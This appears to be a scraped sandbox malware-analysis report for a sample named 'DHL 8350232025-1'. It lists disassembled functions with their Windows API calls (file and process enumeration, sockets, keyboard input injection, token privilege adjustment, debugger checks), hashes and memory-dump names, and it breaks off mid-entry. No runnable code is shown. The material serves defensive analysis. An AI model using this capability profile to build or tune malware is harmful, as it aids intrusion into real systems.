Opcode ID: 75b76078b9533712093df998e9a40b20904cf6bbb959fd59846ea2cacdb9958c
Instruction ID: f21cc0f911d9d9cbbb7ecb8cb622873a0eb98eb2e678bbec65ba0a0732a68179
Opcode Fuzzy Hash: 75b76078b9533712093df998e9a40b20904cf6bbb959fd59846ea2cacdb9958c
Instruction Fuzzy Hash: 27310272504315AFDB20DF54E809B9BB7A9FF84310F100A19F984A7191DB75E918CB92

Function 00219B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00219B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00219C8B

Part of subcall function 00213874: GetInputState.USER32 ref: 002138CB
Part of subcall function 00213874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00213966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00219BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00219C75

Strings

*.*, xrefs: 00219B5D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: c677b7fc152e35b40bfe2944b7b4f627e82bf0e18183a003c8972382ed5b6b90
Instruction ID: c2fc6614c887521ddc24e4a910d96e4ed61fb7fa2ef6a4462cc9da60b719d171
Opcode Fuzzy Hash: c677b7fc152e35b40bfe2944b7b4f627e82bf0e18183a003c8972382ed5b6b90
Instruction Fuzzy Hash: 9141717191420A9FCF14DF64D859AEEBBF8EF29310F244056E845A2191EB309ED4CFA0

Function 001B997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 001B9A4E
GetSysColor.USER32(0000000F), ref: 001B9B23
SetBkColor.GDI32(?,00000000), ref: 001B9B36

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: f0b8125449c541c592fe579eee7d0cc52b3b186d229cab89dd2b34faab2eec73
Instruction ID: 5c66a17c230980777dba49047c836316f7c1c07ef6eef288394d0a172e998712
Opcode Fuzzy Hash: f0b8125449c541c592fe579eee7d0cc52b3b186d229cab89dd2b34faab2eec73
Instruction Fuzzy Hash: 30A1F4B0118448AEE728AA3C9C9DEFB369DDF42350F264209F702D76D1CB259D53C672

Function 00221806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0022304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0022307A
Part of subcall function 0022304E: _wcslen.LIBCMT ref: 0022309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0022185D
WSAGetLastError.WSOCK32 ref: 00221884
bind.WSOCK32(00000000,?,00000010), ref: 002218DB
WSAGetLastError.WSOCK32 ref: 002218E6
closesocket.WSOCK32(00000000), ref: 00221915

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 1274ed1e2b7e2bb4e92d9c03fa6943d323b5f3a6ef42e239c00267e353acbd6e
Instruction ID: 1ea798785d1009919932709666415928f1f17f8fd182fa86fb8703dc0d377d5c
Opcode Fuzzy Hash: 1274ed1e2b7e2bb4e92d9c03fa6943d323b5f3a6ef42e239c00267e353acbd6e
Instruction Fuzzy Hash: D151E475A00210AFEB10AF64D88AF6A77E5AB55718F18805CF9096F3C3C771ED418BA1

Function 00231C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00231CC0
IsWindowEnabled.USER32 ref: 00231CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00231CDB
IsIconic.USER32 ref: 00231CE9
IsZoomed.USER32 ref: 00231CF7

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3affdc7d94238f228445ff3229833d2cec0225b18226226f032e7c4321a58bb0
Instruction ID: 4ade058c146b73e24960ea60121be29caea7ada774b85d2b01dc777d512a2d9e
Opcode Fuzzy Hash: 3affdc7d94238f228445ff3229833d2cec0225b18226226f032e7c4321a58bb0
Instruction Fuzzy Hash: 572127B17502019FD3208F2AD884B2A7BE4FF85310F189469E846DB351CB71DC62CBD1

Function 001A8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 001E5DF0
VUUU, xrefs: 001A83E8
VUUU, xrefs: 001A843C
VUUU, xrefs: 001A83FA
ERCP, xrefs: 001A813C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: d9a32929095a4b862dc71f3faa702a94f1434bfc511516c703bb04ba6a3e4cc2
Instruction ID: afa5b8f2c5bd56b1a7a3fdddd8a3731c346334126634ef6afd94b5e41e9e69df
Opcode Fuzzy Hash: d9a32929095a4b862dc71f3faa702a94f1434bfc511516c703bb04ba6a3e4cc2
Instruction Fuzzy Hash: F7A2A274E00A5ACBDF28CF59C8507BEB7B2BF55314F2581AAE819A7285DB309D81CF50

Function 00208298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002082AA

Strings

tb&, xrefs: 002084F4
(, xrefs: 002082F0
|, xrefs: 002082DA

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: lstrlen
String ID: ($tb&$|
API String ID: 1659193697-4108677313
Opcode ID: 1f8b37cd0dd339a500cba252ee604d8911a462fa6c8cc400431313782be4ba13
Instruction ID: 6de78303108b6fc5baba1d46524c6992c1c633b24a95418806bd36fabc98f7f4
Opcode Fuzzy Hash: 1f8b37cd0dd339a500cba252ee604d8911a462fa6c8cc400431313782be4ba13
Instruction Fuzzy Hash: F6323674A107069FCB28CF59C481A6AB7F0FF48710B15C56EE59ADB3A2EB70E951CB40

Function 0022A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0022A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0022A6BA

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0022A79C
CloseHandle.KERNEL32(00000000), ref: 0022A7AB

Part of subcall function 001BCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,001E3303,?), ref: 001BCE8A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 06ca422820ef435d1ce7bbcee66a1ed5368e7bb17a1134a07c1a564801789747
Instruction ID: 570b20ca3b39add3c4092f3d33319d972799524ee258515ad3239e056cdf8d92
Opcode Fuzzy Hash: 06ca422820ef435d1ce7bbcee66a1ed5368e7bb17a1134a07c1a564801789747
Instruction Fuzzy Hash: C2516DB5508310AFD710EF24D886A6BBBE8FF99754F40892DF58997291EB30D904CB92

Function 0020AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0020AAAC
SetKeyboardState.USER32(00000080), ref: 0020AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0020AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0020AB88

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9b8dced380253d8ecbe8109f9e3d56bd427cd73fa59dcff0f772f8e9e75aeffa
Instruction ID: 9f138887619e788a9cb2371d272a24ed898676d32cf2f1c1bd13b09c9752ce61
Opcode Fuzzy Hash: 9b8dced380253d8ecbe8109f9e3d56bd427cd73fa59dcff0f772f8e9e75aeffa
Instruction Fuzzy Hash: FB313B31A60309AEFF35CF64CC05BFA7BAAAB64314F94421AF481561D3D374C9A1C762

Function 0021CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0021CE89
GetLastError.KERNEL32(?,00000000), ref: 0021CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0021CEFE

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 21f07c5930184d4d79d2738c08cd349e29dc85ccf3ac85ef1437d783dac49f6a
Instruction ID: d93c27a5d738076be3d89cbe0218b77e89b68b834978f2c6b04257323a110b30
Opcode Fuzzy Hash: 21f07c5930184d4d79d2738c08cd349e29dc85ccf3ac85ef1437d783dac49f6a
Instruction Fuzzy Hash: 5521EDB9550306ABDB30CFA5D948BA7B7FCEB20314F30442EE642A2151E770EE958B90

Function 0020DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,001E5222), ref: 0020DBCE
GetFileAttributesW.KERNEL32(?), ref: 0020DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0020DBEE
FindClose.KERNEL32(00000000), ref: 0020DBFA

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 78993ab6ed5795340b0cfbe2a3c53d554ebbbee2227e5dadaea882da1368c453
Instruction ID: 90d199480f11931bc5733840138f8ddc3fb2cdc15c8206a731aa771f39ecd48f
Opcode Fuzzy Hash: 78993ab6ed5795340b0cfbe2a3c53d554ebbbee2227e5dadaea882da1368c453
Instruction Fuzzy Hash: 74F0A031821A2057D3206FBCAC0D8AB3B6C9E01334BA04703F876D20E1EBB059648A95

Function 00215C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00215CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00215D17
FindClose.KERNEL32(?), ref: 00215D5F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 9c97785bdfbb729c885d1b0c4d37b6f907f084a37b6474104ca9e83d26f3e789
Instruction ID: 9c4650a7a2e6946eb382a4bc40d568791c7f48cc1215d7159338863de9dd8d0d
Opcode Fuzzy Hash: 9c97785bdfbb729c885d1b0c4d37b6f907f084a37b6474104ca9e83d26f3e789
Instruction Fuzzy Hash: 9D51AA74614602DFC714CF28D484E96B7E4FF5A324F14859EE95A8B3A2CB30ED94CB91

Function 001D2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 001D271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001D2724
UnhandledExceptionFilter.KERNEL32(?), ref: 001D2731

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2d4a8eba42ee3b09dcad8b08c50ab28a9c4abe441f968da1fb7cfb7164d7fb15
Instruction ID: edd8bf87717ccd807371e6eeb41c7a66a4d3348010a70bba93d076d86ea1b94d
Opcode Fuzzy Hash: 2d4a8eba42ee3b09dcad8b08c50ab28a9c4abe441f968da1fb7cfb7164d7fb15
Instruction Fuzzy Hash: 7931D57590122CABCB21DF64DC88B9DBBB8BF18310F5041EAE81CA7260E7349F818F44

Function 002151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002151DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00215238
SetErrorMode.KERNEL32(00000000), ref: 002152A1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 248456faf97f30066e1fd914f8e8fd3a039fb0335699981893ac5e5026c5b924
Instruction ID: 617a9c293577397ee96f11dd2c5ac7d5c0ebc24e1b78228fdd4002afb0c85dc1
Opcode Fuzzy Hash: 248456faf97f30066e1fd914f8e8fd3a039fb0335699981893ac5e5026c5b924
Instruction Fuzzy Hash: FF315E75A10618DFDB00DF54D888EADBBF4FF59314F148099E809AB3A2DB31E855CBA0

Function 002016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 001BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001C0668
Part of subcall function 001BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001C0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0020170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0020173A
GetLastError.KERNEL32 ref: 0020174A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 157c58cb9ec976f01dc838fc891827ece651edb51af928f56a4f99aa2c30fc86
Instruction ID: bb8c09450defa472e8cc5c9ea9cdfae90cd28d74d1116be22cb9db825874a1d0
Opcode Fuzzy Hash: 157c58cb9ec976f01dc838fc891827ece651edb51af928f56a4f99aa2c30fc86
Instruction Fuzzy Hash: BE11A3B2514305AFD7189F54ECC6EABB7BDEB44714B20852EF05657291EB70FC518B20

Function 0020D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0020D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0020D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0020D650

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 853e2c15d9b468a9efea9e9ead3f711683a809825a78c20ad6613b609686fb3e
Instruction ID: dad32ec43a31b319fddf313acd8cff8df35b9e42cf3fe7dea6ab5c41e6895a6c
Opcode Fuzzy Hash: 853e2c15d9b468a9efea9e9ead3f711683a809825a78c20ad6613b609686fb3e
Instruction Fuzzy Hash: 9D113C75E05228BBDB108F95AC49FAFBBBCEB45B50F108156F904E7290D6704A058BA1

Function 00201663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0020168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002016A1
FreeSid.ADVAPI32(?), ref: 002016B1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 88595cd414c060f594c4efa0dadfe05d0038f800dcb2edcbc2d2948dd53d8d7e
Instruction ID: d32da7ab5b180f30755bdde0ca4c5e8356aa1eb5ec197fafddd0d4468b94ba03
Opcode Fuzzy Hash: 88595cd414c060f594c4efa0dadfe05d0038f800dcb2edcbc2d2948dd53d8d7e
Instruction Fuzzy Hash: 27F0F47195030DFBDB00DFE49D89AAEBBBCEB08704F504565E501E2181E774AA548B50

Function 001C4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(001D28E9,?,001C4CBE,001D28E9,002688B8,0000000C,001C4E15,001D28E9,00000002,00000000,?,001D28E9), ref: 001C4D09
TerminateProcess.KERNEL32(00000000,?,001C4CBE,001D28E9,002688B8,0000000C,001C4E15,001D28E9,00000002,00000000,?,001D28E9), ref: 001C4D10
ExitProcess.KERNEL32 ref: 001C4D22

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 49cb3d25cf6470a3d90b4c40f87801baa2f342c2c01cb9897efd847411b79a77
Instruction ID: 5d581dc1e8db5f4484ea48b1ae4c77adb69967b07bf9ec95234ce717565846ee
Opcode Fuzzy Hash: 49cb3d25cf6470a3d90b4c40f87801baa2f342c2c01cb9897efd847411b79a77
Instruction Fuzzy Hash: 1BE0B631004148ABCF11BFA4ED1EFA83B69EB61791B204458FC1A9A222CB35DE52DB80

Function 001DC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 001DC36C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
